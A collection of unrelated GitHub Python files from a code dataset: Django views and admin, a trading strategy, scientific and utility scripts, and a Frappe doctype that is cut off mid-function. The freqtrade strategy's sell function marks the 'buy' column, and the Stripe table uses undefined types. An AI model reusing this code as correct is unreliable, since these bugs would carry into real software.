WO=WebPage.objects.get(name=n)
AO=AcessRecord.objects.get_or_create(name=WO,date=date,author=author)[0]
AO.save()
return HttpResponse('data is inserted')
return render(request,'AcessRecord.html')
def retrieve_webpage(request):
LTO=Topic.objects.all()
d={'LTO':LTO}
if request.method=='POST':
msts=request.POST.getlist('topic')
rwos=WebPage.objects.none()
for i in msts:
rwos=rwos|WebPage.objects.filter(topic_name=i)
d1={'rwos':rwos}
return render(request,'display_webpage.html',d1)
return render(request,'Webpage.html',d)
def checkbox(request):
LTO=Topic.objects.all()
d={'LTO':LTO}
return render(request,'checkbox.html',d)
| oppalaa/sample | app/views.py | views.py | py | 1,999 | python | en | code | 0 | github-code | 13 |
3645175993 | import argparse
from hvarma import Data, ArmaParam, run_model, write_results, plot_hvratio
def select_parameters_from_args(args):
""" Filter out ArmaParam attributes from commandline arguments """
args_dict = {}
for arg in vars(args):
if arg in ArmaParam.get_fields_list():
if getattr(args, arg) is not None:
args_dict[arg] = getattr(args, arg)
return args_dict
def write_frequencies_in_file(param, results):
""" Write the frequency results in a file """
from hvarma.write_output import generate_filename
filename = generate_filename(param.output_dir, results.station,
param.model_order, results.num_windows)
pos_freq, pos_err, neg_freq, neg_err = results.get_frequency(param.freq_conf)
with open(filename + '.res', 'w') as fres:
fres.write('POSITIVE {:.6f} error {:.6f} Hz '
'NEGATIVE {:.6f} error {:.6f} Hz\n'
.format(pos_freq, pos_err, neg_freq, neg_err))
def main(args):
data = Data.from_sac(Z_fname=args.Z_fname,
N_fname=args.N_fname,
E_fname=args.E_fname)
if args.args_file is not None:
param = ArmaParam.from_file(args.args_file)
else:
param = ArmaParam()
args_dict = select_parameters_from_args(args)
param = param.update(args_dict)
if not args.silent:
print('Data read correctly')
results = run_model(data, param, verbose=not args.silent)
write_results(data, param, results)
plot_hvratio(param, results, format='png')
write_frequencies_in_file(param, results)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('Z_fname', type=str, help="SAC data in direction Z")
parser.add_argument('N_fname', type=str, help="SAC data in direction N")
parser.add_argument('E_fname', type=str, help="SAC data in direction E")
parser.add_argument('--model_order', type=int, help="HVARMA model order")
parser.add_argument('--output_dir', type=str, help="Directory in which to store output")
parser.add_argument('--max_windows', type=int, help="Maximum number of windows to explore within data.")
parser.add_argument('--window_size', type=int, help="Size of each individual window.")
parser.add_argument('--overlap', type=int, help="Overlap between individual windows.")
parser.add_argument('--args_file', type=str, help="File with all the default arguments.", default=None)
parser.add_argument('--freq_points', type=int, help="Number of frequency points to "
"calculate between neg_freq and pos_freq")
parser.add_argument('--freq_conf', type=float, help='Frequency confidence interval.')
parser.add_argument('--silent', help="No output to stdout", action='store_false', default=False)
main(parser.parse_args())
| asleix/hvarma | examples/run.py | run.py | py | 2,921 | python | en | code | 0 | github-code | 13 |
71202979859 | #!/usr/bin/env python
import sys
from os.path import expanduser
import os
sys.path.append(os.path.join(expanduser("~"), "src/anki"))
from anki import Collection
from sqlite3 import OperationalError
from termcolor import colored
from argparse import ArgumentParser
import re
import random
import sys
parser = ArgumentParser()
parser.add_argument('-c', '--collection', required=True,
help='path to the anki database')
parser.add_argument('-d', '--deck', required=True,
help='name of the Anki deck to use')
parser.add_argument('-s', '--show-answer', action='store_true',
help='show the answer in addition to the question')
parser.add_argument('--days', required=False,
default=1,
help='number of days to look forward')
args = parser.parse_args()
try:
col = Collection(args.collection)
except OperationalError:
print(colored("Anki Deck locked", "magenta"))
sys.exit(0)
except Exception as e:
print(colored("Error loading collection", "magenta"))
sys.exit(0)
deck = col.decks.byName(args.deck)
if not deck:
print(colored("Deck {} not found".format(args.deck), "magenta"))
sys.exit(0)
cards = col.db.list(
"select id from cards where did={} and due between {} and {}".format(
deck['id'], col.sched.today, col.sched.today + int(args.days)))
qas = col.renderQA(cards)
qa = random.choice(qas)
question = qa['q'].encode('utf-8')
answer = qa['a'].encode('utf-8')
question = re.sub('\[\[.*?\]\]', '', question)
answer = re.sub('.*answer>', '', answer, flags=re.DOTALL)
print(colored(question.strip(), "yellow", attrs=['dark'])),
if args.show_answer:
print(colored(answer.strip(), "grey", attrs=['dark']))
with open(os.path.join(expanduser("~"), ".anki-answer"), "wb") as f:
f.write(answer.strip())
| jarv/anki-prompt | anki-prompt.py | anki-prompt.py | py | 1,853 | python | en | code | 0 | github-code | 13 |
17700482583 | # we use googletrans API new name is google_trans_new
# pip command ; pip install google_trans_new
from google_trans_new import google_translator
import streamlit as st
translator = google_translator()
st.title("Language Translator")
text = st.text_input("Enter a text")
translate = translator.translate(text, lang_tgt='fr') # fr means french
st.write(translate)
# Since we are using the streamlit library here, we need to run this code using the streamlit run file name.py command in your terminal.
| cinalimaster/ariftanis | Python/project_library/interactive_language_translator.py | interactive_language_translator.py | py | 502 | python | en | code | 0 | github-code | 13 |
2295560053 | import datetime
import json
import math
import threading
import tkinter
import urllib.request
import requests
from PIL import Image, ImageTk
prev_lat, prev_long, prev_time, prev_speed = 0, 0, 0, 0
def distance_on_unit_sphere(lat1, long1, lat2, long2):
# Convert latitude and longitude to
# spherical coordinates in radians.
degrees_to_radians = math.pi / 180.0
# phi = 90 - latitude
phi1 = (90.0 - lat1) * degrees_to_radians
phi2 = (90.0 - lat2) * degrees_to_radians
# theta = longitude
theta1 = long1 * degrees_to_radians
theta2 = long2 * degrees_to_radians
# Compute spherical distance from spherical coordinates.
# For two locations in spherical coordinates
# (1, theta, phi) and (1, theta', phi')
# cosine( arc length ) =
# sin phi sin phi' cos(theta-theta') + cos phi cos phi'
# distance = rho * arc length
cos = math.sin(phi1) * math.sin(phi2) * math.cos(theta1 - theta2) + math.cos(
phi1
) * math.cos(phi2)
# Remember to multiply arc by the radius of the earth
# in your favorite set of units to get length.
return math.acos(cos)
def start():
top = tkinter.Tk()
top.title("ISS Tracker")
def counter_label(label):
def count():
global prev_lat
global prev_long
global prev_time
global prev_speed
req = requests.get("http://api.open-notify.org/iss-now.json")
obj = req.json()
lat = float(obj["iss_position"]["latitude"])
long = float(obj["iss_position"]["longitude"])
timestamp = int(obj["timestamp"])
time_change = timestamp - prev_time
distance_moved = (
distance_on_unit_sphere(prev_lat, prev_long, lat, long) * 4164
)
speed = distance_moved * 3600
if time_change != 1 or distance_moved > 5:
label.config(
text="Estimated speed: {} mph\nLatitude: {}\nLongitude: {}".format(
prev_speed, lat, long
)
)
else:
label.config(
text="Estimated speed: {} mph\nLatitude: {}\nLongitude: {}".format(
speed, lat, long
)
)
prev_speed = speed
prev_lat, prev_long, prev_time = lat, long, timestamp
label.after(1000, count)
count()
title = tkinter.Label(
top, height=1, width=50, font=("Arial", 25, "bold"), text="ISS Tracker"
)
title.pack()
label = tkinter.Label(top, height=3, width=50, font=("Arial", 20))
label.pack()
counter_label(label)
top.mainloop()
| bsoyka/iss-tracker | iss_tracker/__init__.py | __init__.py | py | 2,745 | python | en | code | 3 | github-code | 13 |
17930590562 | from marshmallow import fields, pre_load
from .flapp.extension import db, ma
from .model.ublog import Note, Person
from .model.library import Book, Quote
# Custom validator
def must_not_be_blank(data):
if not data:
raise ValidationError("Data not provided.")
class NoteSchema(ma.SQLAlchemyAutoSchema):
class Meta:
model = Note
load_instance = True
sqla_session = db.session
include_fk = True
class PersonSchema(ma.SQLAlchemyAutoSchema):
class Meta:
model = Person
load_instance = True
sqla_session = db.session
include_relationships = True
# https://marshmallow.readthedocs.io/en/stable/marshmallow.fields.html#marshmallow.fields.Nested
notes = fields.Nested(NoteSchema, many=True)
books = ma.auto_field()
formatted_name = fields.Method("format_name", dump_only=True)
def format_name(self, person):
return f"{person.lname}, {person.fname}"
class ShipmentSchema(ma.Schema):
class Meta:
fields = (
"id",
"item",
"description",
"status",
"tracking_number",
"current_location",
"source",
"destination",
"description",
"arrival",
)
class BookSchema(ma.SQLAlchemyAutoSchema):
class Meta:
model = Book
include_fk = True
class QuoteSchema(ma.Schema):
id = fields.Int(dump_only=True)
author = fields.Nested(PersonSchema, validate=must_not_be_blank)
quote_text = fields.Str(required=True, validate=must_not_be_blank)
posted_at = fields.DateTime(dump_only=True)
# Allow client to pass author's full name in request body
# e.g. {"author': 'Tim Peters"} rather than {"first": "Tim", "last": "Peters"}
@pre_load
def process_author(self, data, **kwargs):
author_name = data.get("author")
if author_name:
first, last = author_name.split(" ")
author_dict = dict(fname=first, lname=last)
else:
author_dict = {}
data["author"] = author_dict
return data
| thinknot/connx-alembic | src/schema.py | schema.py | py | 2,130 | python | en | code | 0 | github-code | 13 |
3108184746 | """
The program receives from the USER a STRING
and returns (ignoring spaces and punctuation marks),
whether or not it is a PALINDROME.
"""
# START Definition of FUNCTION
def checkWord(string):
string = string.upper()
index_sx = 0 # left index
index_dx = len(string)-1 # right index
check = 0
while index_sx < index_dx:
# CHECK characters
if ("A" <= string[index_sx] <= "Z" or "0" <= string[index_sx] <= "9") and \
("A" <= string[index_dx] <= "Z" or "0" <= string[index_dx] <= "9"):
check += 1
if string[index_sx] != string[index_dx]:
return "IS NOT a PALINDROME."
index_sx += 1 # increasing left index
index_dx -= 1 # decreasing right index
elif ("A" <= string[index_sx] <= "Z" or "0" <= string[index_sx] <= "9") and \
not("A" <= string[index_dx] <= "Z" or "0" <= string[index_dx] <= "9"):
index_dx -= 1 # decreasing only right index
elif not ("A" <= string[index_sx] <= "Z" or "0" <= string[index_sx] <= "9") and \
("A" <= string[index_dx] <= "Z" or "0" <= string[index_dx] <= "9"):
index_sx += 1 # increasing left index
else:
index_sx += 1 # increasing left index
index_dx -= 1 # decreasing right index
if check > 0:
return "IS a PALINDROME."
else:
return"IS NOT a CHARACTER STRING."
# END Definition of FUNCTION
# Acquisition and Control of the DATA entered by the USER
word = input("Enter the STRING: ")
# Evaluation if STRING is a PALINDROME
palindrome = checkWord(word)
# Displaying the RESULT
print("\"" + word.upper() + "\" (ignoring spaces and punctuation marks) " + palindrome)
| aleattene/python-workbook | chap_03/exe_076_multiple_word_palindromes.py | exe_076_multiple_word_palindromes.py | py | 1,857 | python | en | code | 1 | github-code | 13 |
38259646951 | import tensorflow as tf
node1 = tf.constant(3.0, tf.float32)
node2 = tf.constant(4.0)
node3 = tf.add(node1, node2)
sess = tf.Session()
a = tf.placeholder(tf.float32)
b = tf.placeholder(tf.float32)
adder_node = a + b
# feed_dict >> placeholder 에 반드시 따라온다
# 텐서머신의 그래프 역할을 하는듯? 함수같이?
print(sess.run(adder_node, feed_dict = {a:3, b:4.5}))
print(sess.run(adder_node, feed_dict = {a:[1,3], b:[3,4]}))
add_and_triple = adder_node * 3
print(sess.run(add_and_triple, feed_dict = {a:4, b:2}))
| dongjaeseo/study | tf114/tf04_1_placeholder.py | tf04_1_placeholder.py | py | 541 | python | en | code | 2 | github-code | 13 |
29730853815 | #!/bin/python3
# -*- coding: utf-8 -*-
"""Parameter search (2020 Line recruit test)
This is code for 2020 line recruit test problem B.
Author: Bae Jiun, Maybe
"""
from typing import Tuple
import sys
import argparse
from multiprocessing import Pool, cpu_count
from itertools import product
from pathlib import Path
import json
import numpy as np
sys.path.append(str(Path(__file__).parent.parent.absolute()))
from lib import criterion, data, seed
from lib.recommender import Recommender
# Using as global constant variable
param_space = None
train, test = None, None
test_header = None
critic = None
def runner(args: argparse.Namespace) \
-> Tuple[argparse.Namespace, float]:
global train, test, test_header, critic
# Fit model, using train data
model = Recommender(factors=args.factor, epochs=args.epoch,
mean=args.mean, derivation=args.dev,
lr=args.lr, reg=args.reg)
model.fit(train[:, :2], train[:, 2])
# Predict by test data and calculate error
predictions = model.predict(test[:, :2])
error = critic(predictions, test[:, 2])
print(f'RMSE: {error}')
# Save predictions
result = test.copy()
result[:, 2] = predictions
data.to_csv(args.result, result, header=test_header)
return args, error
def wrapper(*args) \
-> Tuple[argparse.Namespace, float]:
param = dict(zip(param_space.keys(), *args))
param['result'] = str(result_prefix.joinpath(f"{'-'.join(map(str, param.values()))}.csv"))
args = argparse.Namespace(**param)
print(f'Testing param as {args}')
return runner(args)
def main(args: argparse.Namespace):
global train, test, test_header
# Reproducible (Important)
# An experiment that can not be reproduced can not make any conclusions.
# So fix random seed before anything else.
seed(args.seed)
# Load dataset
# Provides two dataset loading methods
# - Load from whole csv and split train, test by condition (slow)
# - Load each train, test csv (faster)
# (Using scripts/split.py to split train, test by condition)
if args.dataset:
dataset = data.Dataset(args.dataset)
train, test = dataset.split_train_test(args.mode)
test_header = dataset.rating_headers
else:
train, train_header = data.read_csv(args.train)
test, test_header = data.read_csv(args.test)
# Find param in search space
params = list(product(*param_space.values()))
if args.size:
indexes = np.random.choice(len(params), args.size, replace=False)
params = [params[i] for i in indexes]
print(f'Search space: {len(params)}')
print(f'Param: {param_space}')
with Pool(args.cpu or cpu_count()) as pool:
results = pool.map(wrapper, params)
best, *_ = sorted(results, key=lambda x: x[1])
print(f'Best RMSE: {best[1]}')
print(f'param: {best[0]}')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
# Provide single csv file and split automatically
parser.add_argument("--dataset", type=str, default='', required=False,
help="Dataset path")
parser.add_argument("--mode", type=str, default='train', choices=['train', 'test', 'tiny'],
help="Dataset load mode")
# Provide each train, test dataset
parser.add_argument("--train", type=str, default='', required=False,
help="Train dataset directory path")
parser.add_argument("--test", type=str, default='', required=False,
help="Test dataset directory path")
parser.add_argument("--search", type=str, default='./data/search.json', required=True,
help="Path to search parameters")
parser.add_argument("--result", type=str, default='./results', required=False,
help="Result directory path")
parser.add_argument("--cpu", type=int, default=0, required=False,
help="# of processors to use")
parser.add_argument("--size", type=int, default=0, required=False,
help="Size of search space")
parser.add_argument('-s', '--seed', required=False,
default=42,
help="The answer to life the universe and everything")
parser.add_argument('--criterion', type=str, default='RMSE', choices=['RMSE'],
help="The answer to life the universe and everything")
default_args = parser.parse_args()
with open(default_args.search) as f:
param_space = json.load(f)
result_prefix = Path(default_args.result)
result_prefix.mkdir(exist_ok=True, parents=True)
# Set criterion as RMSE
critic = criterion.get(default_args.criterion)()
main(default_args)
| leejseo/2020-line-recruit | scripts/parameter_search.py | parameter_search.py | py | 4,807 | python | en | code | 0 | github-code | 13 |
4791896088 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split, GridSearchCV
from sklearn.feature_extraction import DictVectorizer
# 计算多个树,然后取多数为真
from sklearn.ensemble import RandomForestClassifier
data = pd.read_csv(r"learning\机器学习\自学算法\决策树算法\titanic.csv")
x = data[["Pclass", "Age", "Sex"]]
y = data["Survived"]
x["Age"].fillna(x["Age"].mean(), inplace=True)
# 数据集划分
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=.2)
# 特征工程
transfer = DictVectorizer()
x_train = transfer.fit_transform(x_train.to_dict(orient="records"))
x_test = transfer.fit_transform(x_test.to_dict(orient="records"))
# 换随机决策树分类器模型(先不传参数)
estimator = RandomForestClassifier()
param_grid = {
"n_estimators": [120, 200, 300, 500, 800, 1200],
"max_depth": [5, 8, 15, 25, 30]
}
# 交叉验证网格验证,求取一个最好的预测模型
estimator = GridSearchCV(estimator, param_grid=param_grid, cv=5)
estimator.fit(x_train, y_train)
# 预测值
score = estimator.score(x_test, y_test)
print(score)
# 看最好的模型设置
a = estimator.best_estimator_
print(a)
| LeroyK111/BasicAlgorithmSet | 集成学习算法/随机森林.py | 随机森林.py | py | 1,288 | python | en | code | 1 | github-code | 13 |
26854883355 | # from pytorch_pretrained_bert import BertTokenizer
import copy
from transformers import BertTokenizer
from tcn_test_7.data_tcn import *
from torchtext.vocab import build_vocab_from_iterator, Vocab
import pandas as pd
from sklearn.model_selection import KFold
from tcn_test_7.model import CpsTcnModel
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
parameters = Parameters()
def build_vocab_from_iterator_re(train_iter):
vocab = build_vocab_from_iterator(yield_tokens(train_iter), specials=['[PAD]', '[CLS]', '[SEP]'])
vocab.set_default_index(vocab["[PAD]"])
return vocab
def data_iter(dataset: MyDataset):
for index in range(0, dataset.__len__()):
yield dataset.__getitem__(index)
def yield_tokens(d_iter):
for _, text in d_iter:
if type(text) == float:
print(text)
continue
else:
yield tokenizer.tokenize(text)
def load_data():
_dir = '../data/tcn_test_data/tcn-model-data3.csv'
df = pd.read_csv(_dir)
df = df[df['DataCode'] == 5000]
df = df[df['Action_S'].notna()]
# 按组划分测试数据
grouped_data = df.groupby(['NewName'])
df_list = []
for idx, (name, group) in enumerate(grouped_data):
df_list.append(group)
return df_list
def get_vocab():
_dir = '../data/tcn_test_data/tcn-model-data3.csv'
df = pd.read_csv(_dir)
df = df[df['DataCode'] == 5000]
df = df[df['Action_S'].notna()]
df.reset_index(inplace=True)
dataset = MyDataset(df)
return build_vocab_from_iterator_re(data_iter(dataset))
# k折交叉验证
def k_fold_test(vocab: Vocab):
# 加载数据
df_list = load_data()
kf = KFold(n_splits=parameters.n_splits, shuffle=True, random_state=parameters.random_state)
for train_index, test_index in kf.split(df_list):
# 数据是df
train_data = pd.concat([df_list[i] for i in train_index])
test_data = pd.concat([df_list[i] for i in test_index])
train_data.reset_index(inplace=True)
test_data.reset_index(inplace=True)
# 数据是MyDataset
dataset_train = MyDataset(train_data)
dataset_test = MyDataset(test_data)
# 数据是Data
train_data = Data(dataset_train, vocab)
test_data = Data(dataset_test, vocab)
yield train_data, test_data
def generate_model(vocab):
model = CpsTcnModel(len(vocab), 11, [parameters.embedding_size] * 3)
model.to(parameters.device)
return model
if __name__ == '__main__':
pass
| xiaoyuerova/CPSProject | tcn_test_7/utils.py | utils.py | py | 2,532 | python | en | code | 0 | github-code | 13 |
23727083350 | # %%
from typing import List
class Solution:
def nearestValidPoint(self, x: int, y: int, points: List[List[int]]) -> int:
res = -1
minn = float("inf")
for i, point in enumerate(points):
x_, y_ = point
if x_ == x and minn > abs(y_ - y):
minn = abs(y_ - y)
res = i
if y_ == y and minn > abs(x_ - x):
minn = abs(x_ - x)
res = i
return res
| HXLH50K/Leetcode | 1779.py | 1779.py | py | 474 | python | en | code | 0 | github-code | 13 |
72630150417 | # pragma pylint: disable=missing-docstring, invalid-name, pointless-string-statement
# flake8: noqa: F401
# --- Do not remove these libs ---
import numpy as np # noqa
import pandas as pd # noqa
from pandas import DataFrame
from functools import reduce
from freqtrade.strategy import (BooleanParameter, CategoricalParameter, DecimalParameter,
IStrategy, IntParameter)
# --------------------------------
# Add your lib to import here
import talib.abstract as ta
import freqtrade.vendor.qtpylib.indicators as qtpylib
class DoubleBollingerStrategy(IStrategy):
    """
    Double-Bollinger mean-reversion strategy on daily candles.

    Buys when the close sits between two lower Bollinger bands (20-period
    and 5-period, both 2 std-devs) while the MACD histogram is negative but
    turning upward; exits are driven by ROI targets, a trailing stop and the
    sell trend defined in :meth:`populate_sell_trend`.
    """

    # Hyperopt-tunable thresholds.
    # NOTE(review): neither parameter is referenced in the visible
    # populate_buy_trend(); confirm they are actually wired into the
    # entry/exit logic (sell side is not fully visible here).
    buy_sma20_drop_ratio = DecimalParameter(0.6, 0.8, decimals=1, default=0.8, space="buy")
    sell_sma5_higher_ratio = DecimalParameter(0.9, 1.3, decimals=1, default=1.3, space="sell")

    # Strategy interface version - allow new iterations of the strategy interface.
    # Check the documentation or the Sample strategy to get the latest version.
    INTERFACE_VERSION = 2

    # Minimal ROI designed for the strategy (keys are minutes since trade open,
    # values are the profit ratio at which to exit).
    # This attribute will be overridden if the config file contains "minimal_roi".
    minimal_roi = {
        "0": 0.579,
        "3653": 0.373,
        "19881": 0.161,
        "41906": 0
    }

    # Hard stoploss: exit at a 4.8% loss.
    stoploss = -0.048

    # Trailing stop: armed only once profit reaches the 38.5% offset,
    # then trails 29.4% below the peak.
    trailing_stop = True
    trailing_stop_positive = 0.294
    trailing_stop_positive_offset = 0.385
    trailing_only_offset_is_reached = True

    # Optimal timeframe for the strategy (daily candles).
    timeframe = '1d'

    # Run "populate_indicators()" only for new candle.
    process_only_new_candles = False

    # These values can be overridden in the "ask_strategy" section in the config.
    use_sell_signal = True
    sell_profit_only = False
    ignore_roi_if_buy_signal = False

    # Number of candles the strategy requires before producing valid signals
    # (covers the 20-period Bollinger window plus MACD warm-up).
    startup_candle_count: int = 30

    # Optional order type mapping.
    order_types = {
        'buy': 'limit',
        'sell': 'limit',
        'stoploss': 'market',
        'stoploss_on_exchange': False
    }

    # Optional order time in force.
    order_time_in_force = {
        'buy': 'gtc',
        'sell': 'gtc'
    }

    # NOTE(review): plot_config references 'tema', 'sar', 'rsi' and
    # 'macdsignal', none of which populate_indicators() computes in this
    # file -- these plots will be empty; confirm or update the config.
    plot_config = {
        # Main plot indicators (Moving averages, ...)
        'main_plot': {
            'tema': {},
            'sar': {'color': 'white'},
        },
        'subplots': {
            # Subplots - each dict defines one additional plot
            "MACD": {
                'macd': {'color': 'blue'},
                'macdsignal': {'color': 'orange'},
            },
            "RSI": {
                'rsi': {'color': 'red'},
            }
        }
    }
def informative_pairs(self):
"""
Define additional, informative pair/interval combinations to be cached from the exchange.
These pair/interval combinations are non-tradeable, unless they are part
of the whitelist as well.
For more information, please consult the documentation
:return: List of tuples in the format (pair, interval)
Sample: return [("ETH/USDT", "5m"),
("BTC/USDT", "15m"),
]
"""
return []
    def populate_indicators(self, dataframe: DataFrame, metadata: dict) -> DataFrame:
        """
        Adds several different TA indicators to the given DataFrame

        Performance Note: For the best performance be frugal on the number of indicators
        you are using. Let uncomment only the indicator you are using in your strategies
        or your hyperopt configuration, otherwise you will waste your memory and CPU usage.
        :param dataframe: Dataframe with data from the exchange
        :param metadata: Additional information, like the currently traded pair
        :return: a Dataframe with all mandatory indicators for the strategies
        """
        # Momentum Indicators
        # ------------------------------------
        # MACD
        macd = ta.MACD(dataframe)
        dataframe['macd'] = macd['macd']
        dataframe['macdhist'] = macd['macdhist']
        # Wide (20-period) lower Bollinger band used as the entry zone ceiling.
        bollinger = qtpylib.bollinger_bands(qtpylib.typical_price(dataframe), window=20, stds=2)
        dataframe['bb_lowerband20'] = bollinger['lower']
        # Tight (5-period) lower Bollinger band used as the entry zone floor.
        bollinger = qtpylib.bollinger_bands(qtpylib.typical_price(dataframe), window=5, stds=2)
        dataframe['bb_lowerband5'] = bollinger['lower']
        # Short simple moving average used by the sell-side logic.
        dataframe['sma5'] = ta.SMA(dataframe, timeperiod=5)
        return dataframe
def populate_buy_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:
conditions = []
# GUARDS AND TRENDS
conditions.append(dataframe['close'] < dataframe['bb_lowerband20'])
conditions.append(dataframe['close'] > dataframe['bb_lowerband5'])
conditions.append(dataframe['bb_lowerband20'] > dataframe['bb_lowerband5'])
# conditions.append(dataframe['slowk'] < 25)
# conditions.append(dataframe['slowk'] > dataframe['slowd'])
conditions.append(dataframe['macdhist'].shift(1) < 0)
conditions.append(dataframe['macdhist'] > dataframe['macdhist'].shift(1))
conditions.append(dataframe['volume'] > 0)
if conditions:
dataframe.loc[
reduce(lambda x, y: x & y, conditions),
'buy'] = 1
return dataframe
def populate_sell_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:
"""
Based on TA indicators, populates the sell signal for the given dataframe
:param dataframe: DataFrame populated with indicators
:param metadata: Additional information, like the currently traded pair
:return: DataFrame with buy column
"""
conditions = []
# GUARDS AND TRENDS
conditions.append(dataframe['close'] > dataframe['sma5'])
conditions.append(dataframe['volume'] > 0)
if conditions:
dataframe.loc[
reduce(lambda x, y: x & y, conditions),
'buy'] = 1
return dataframe
# dataframe.loc[
# (
# (dataframe['close'] > dataframe['sma5']*1.1) &
# (dataframe['volume'] > 0) # Make sure Volume is not 0
# ),
# 'sell'] = 1
# return dataframe
| ken2190/MyTradingStrategy | DoubleBollingerStrategy.py | DoubleBollingerStrategy.py | py | 6,364 | python | en | code | 0 | github-code | 13 |
14645694375 | from sqlalchemy import Column, ForeignKey, Identity, Integer, String, Table
from . import metadata
# SQLAlchemy Core table mirroring Stripe's GelatoIdNumberReport object
# (result of an Identity id_number verification check).
# NOTE(review): GelatoDataIdNumberReportDate and GelatoIdNumberReportError are
# used below as column types but are not imported in this module; presumably
# they come from sibling generated modules — confirm before use.
GelatoIdNumberReportJson = Table(
    "gelato_id_number_reportjson",
    metadata,
    Column(
        "dob",
        GelatoDataIdNumberReportDate,
        ForeignKey("GelatoDataIdNumberReportDate"),
        comment="Date of birth",
        nullable=True,
    ),
    Column(
        "error",
        GelatoIdNumberReportError,
        ForeignKey("GelatoIdNumberReportError"),
        comment="Details on the verification error. Present when status is `unverified`",
        nullable=True,
    ),
    Column("first_name", String, comment="First name", nullable=True),
    Column("id_number", String, comment="ID number", nullable=True),
    Column("id_number_type", String, comment="Type of ID number", nullable=True),
    Column("last_name", String, comment="Last name", nullable=True),
    Column("status", String, comment="Status of this `id_number` check"),
    # Surrogate primary key generated by the database.
    Column("id", Integer, primary_key=True, server_default=Identity()),
)
# BUG FIX: __all__ previously listed the source file name
# ("gelato_id_number_report.json"), which is not a valid Python identifier and
# breaks `from ... import *`; export the table object defined above instead.
__all__ = ["GelatoIdNumberReportJson"]
| offscale/stripe-sql | stripe_openapi/gelato_id_number_report.py | gelato_id_number_report.py | py | 1,079 | python | en | code | 1 | github-code | 13 |
10796414751 | from django.contrib import admin
from django.contrib.auth.models import Group
from django.contrib.sites.models import Site
from structure.models import Organization, Team, User, Contract, ContractOrganization, ContractTeam
from django.utils.translation import ugettext_lazy as _
class TeamAdmin(admin.ModelAdmin):
    # Team change list: show the owning organization beside the team name,
    # link through the name, and allow filtering by organization.
    list_display = ['organization', 'name']
    list_display_links = ['name']
    list_filter = ['organization']
class UserAdmin(admin.ModelAdmin):
    # Group the user form into login credentials, profile data and team
    # membership sections (section titles are translatable).
    fieldsets = (
        (_('Login'), {
            'fields': ['username', 'password', 'is_active', 'last_login']
        }),
        (_('Basic information'), {
            'fields': ['first_name', 'last_name', 'email', 'is_superuser', 'date_joined']
        }),
        (_('Teams'), {
            'fields': ['teams']
        }),
    )
class ContractOrganizationInline(admin.TabularInline):
    model = ContractOrganization

    def formfield_for_foreignkey(self, db_field, request=None, **kwargs):
        """
        Limit the `default_team` choices to teams of the organization of the
        contract being edited (stashed on the request as ``request._obj_`` by
        ``ContractAdmin.get_form``).
        """
        field = super(ContractOrganizationInline, self).formfield_for_foreignkey(db_field, request, **kwargs)
        if db_field.name == 'default_team':
            if request._obj_ is not None:
                # BUG FIX: the choices live on `field.queryset`; the previous
                # code read and wrote a nonexistent `query_set` attribute, so
                # the organization filter silently had no effect.
                field.queryset = field.queryset.filter(organization=request._obj_.organization)
        return field
class ContractAdmin(admin.ModelAdmin):
    fields = ['name']
    inlines = [ContractOrganizationInline]

    def get_form(self, request, obj=None, **kwargs):
        # Stash the contract being edited on the request so the inline's
        # formfield_for_foreignkey can filter its team choices by organization.
        request._obj_ = obj
        return super(ContractAdmin, self).get_form(request, obj, **kwargs)
# Hide the stock Site and auth Group admin screens; access is managed through
# Organization/Team in this project.  Register the structure models with their
# customized admin classes where one exists.
admin.site.unregister(Site)
admin.site.unregister(Group)
admin.site.register(Organization)
admin.site.register(Team, TeamAdmin)
admin.site.register(User, UserAdmin)
admin.site.register(Contract, ContractAdmin)
| RocknRoot/LIIT | structure/admin.py | admin.py | py | 1,753 | python | en | code | 1 | github-code | 13 |
36458003126 | from __future__ import unicode_literals
import frappe, os, json
from frappe import _
from frappe.utils import cint, today, formatdate, get_timestamp
from frappe.utils.nestedset import NestedSet, get_root_of
from frappe.model.document import Document
import frappe.defaults
from frappe.cache_manager import clear_defaults_cache
from frappe.contacts.address_and_contact import load_address_and_contact
from past.builtins import cmp
import functools
from ifitwala_ed.accounting.doctype.account.account import get_account_currency
class School(NestedSet):
    """Tree-structured School master (frappe NestedSet).  Handles abbreviation
    validation, optional default Location/Cost Center creation, and wiring of
    default ledger accounts and modes of payment."""
    # Link field used by frappe's nested-set machinery to find a node's parent.
    nsm_parent_field = 'parent_school'
    def onload(self):
        # Pull linked Address/Contact records into the form on load.
        load_address_and_contact(self, "school")
    def validate(self):
        self.validate_abbr()
        self.validate_parent_school()
    def on_update(self):
        NestedSet.on_update(self)
        #if not frappe.db.sql("""SELECT name FROM `tabLocation` WHERE school=%s AND docstatus<2 LIMIT 1 """, self.name):
        # self.create_default_location()
        #if not frappe.db.get_value("Cost Center", {"is_group": 0, "school": self.name}):
        # self.create_default_cost_center()
    def on_trash(self):
        # Refuse deletion while child schools exist, then rebuild the tree.
        NestedSet.validate_if_child_exists(self)
        frappe.utils.nestedset.update_nsm(self)
    def after_rename(self, olddn, newdn, merge=False):
        # Keep the display name in sync with the new document name.
        frappe.db.set(self, "school_name", newdn)
        clear_defaults_cache()
    def validate_abbr(self):
        """Derive (when missing) and validate a unique abbreviation of at most 5 chars."""
        if not self.abbr:
            # Default abbreviation: upper-cased initials of the school name.
            self.abbr = ''.join([c[0] for c in self.school_name.split()]).upper()
        self.abbr = self.abbr.strip()
        if self.get('__islocal') and len(self.abbr) > 5:
            frappe.throw(_("Abbreviation cannot have more than 5 characters"))
        if not self.abbr.strip():
            frappe.throw(_("Abbreviation is mandatory"))
        # Abbreviations must be unique across schools.
        if frappe.db.sql("""SELECT abbr FROM `tabSchool` WHERE name!=%s AND abbr=%s""", (self.name, self.abbr)):
            frappe.throw(_("Abbreviation {0} is already used for another school.").format(self.abbr))
    def validate_parent_school(self):
        # Only group nodes may have children in the nested-set tree.
        if self.parent_school:
            is_group = frappe.get_value('School', self.parent_school, 'is_group')
            if not is_group:
                frappe.throw(_("Parent School must be a group school."))
    def create_default_location(self):
        """Create a root location plus one sample classroom and office for this school."""
        for loc_detail in [
            {"location_name": self.name, "is_group": 1},
            {"location_name": _("Classroom 1"), "is_group": 0, "location_type": "Classroom"},
            {"location_name": _("Office 1"), "is_group": 0, "location_type": "Office"}]:
